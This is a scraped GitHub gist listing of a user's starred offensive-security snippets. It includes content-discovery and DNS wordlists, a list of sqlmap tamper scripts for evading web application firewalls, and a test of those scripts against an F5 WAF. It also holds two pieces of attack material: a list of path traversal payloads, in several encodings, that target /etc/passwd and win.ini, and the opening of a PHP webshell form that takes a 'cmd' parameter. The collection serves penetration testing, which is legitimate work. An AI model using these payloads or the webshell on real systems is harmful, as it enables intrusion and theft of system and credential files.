Skip to content

Instantly share code, notes, and snippets.

View 0xbloody's full-sized avatar

0xbloody

14 followers · 111 following
View GitHub Profile
@nullenc0de
nullenc0de / params.txt
Created March 29, 2019 00:57
List of parameters for content discovery
0
1
11
12
13
14
15
16
17
2
@Metnew
Metnew / poc.svg
Created February 4, 2019 19:00
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@orangetw
orangetw / all.txt
Created September 7, 2018 14:36 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@jhaddix
jhaddix / content_discovery_all.txt
Created May 26, 2018 11:51
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
`
~/
~
ים
___
__
_
---
@v3rlly
v3rlly / sqlmap tamper scripts
Created May 14, 2018 08:44 — forked from castexyz/sqlmapTamperScripts.md
Sqlmap TamperScripts
************General Scripts
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
apostrophemask
Replaces apostrophe character with its UTF-8 full width counterpart
apostrophenullencode
Replaces apostrophe character with its illegal double unicode counterpart
base64encode
@mgeeky
mgeeky / sqlmap-tamper-scripts-evaluation.md
Last active March 27, 2025 08:15
SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY

Below names are to be passed to the --tamper= parameter of sqlmap.

The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests view.

The scale is 0-5.

@jhaddix
jhaddix / Testing_Checklist.md
Last active July 29, 2025 14:39 — forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
@samduy
samduy / path_traversal_payloads.txt
Created January 21, 2018 15:41
List of common path traversal attacks (can be used with BurpSuite Instruder)
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../windows/win.ini
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc/passwd
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc/passwd
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc/passwd
@joswr1ght
joswr1ght / easy-simple-php-webshell.php
Last active August 17, 2025 05:31
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
@jhaddix
jhaddix / all.txt
Last active August 26, 2025 01:36
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎